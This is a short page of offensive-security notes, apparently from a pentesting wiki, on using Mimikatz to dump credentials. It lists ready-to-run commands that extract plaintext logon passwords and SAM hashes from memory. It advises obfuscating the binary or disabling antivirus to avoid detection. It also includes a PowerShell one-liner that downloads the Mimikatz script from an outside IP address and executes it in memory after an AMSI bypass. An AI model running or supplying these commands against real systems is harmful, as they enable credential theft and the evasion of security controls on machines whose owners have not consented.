Mimikatz

Overview

Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable or turning off AV is your best bet for using it

Running Mimikatz

Inside of an Administrator shell

mimikatz.exe
privilege::debug                - enables all other attacks
sekurlsa::logonPasswords        - can show plaintext passwords saved in credman

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

The credman passwords appear in clear text because when a network drive is mapped using the Connect using different credentials option, it is cached into credman as clear-text.

Mimikatz.ps1

Run in memory after amsi bypass

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')

PreviousRPC Password Change NextKnock and Pass Kerberos

Last updated 10 months ago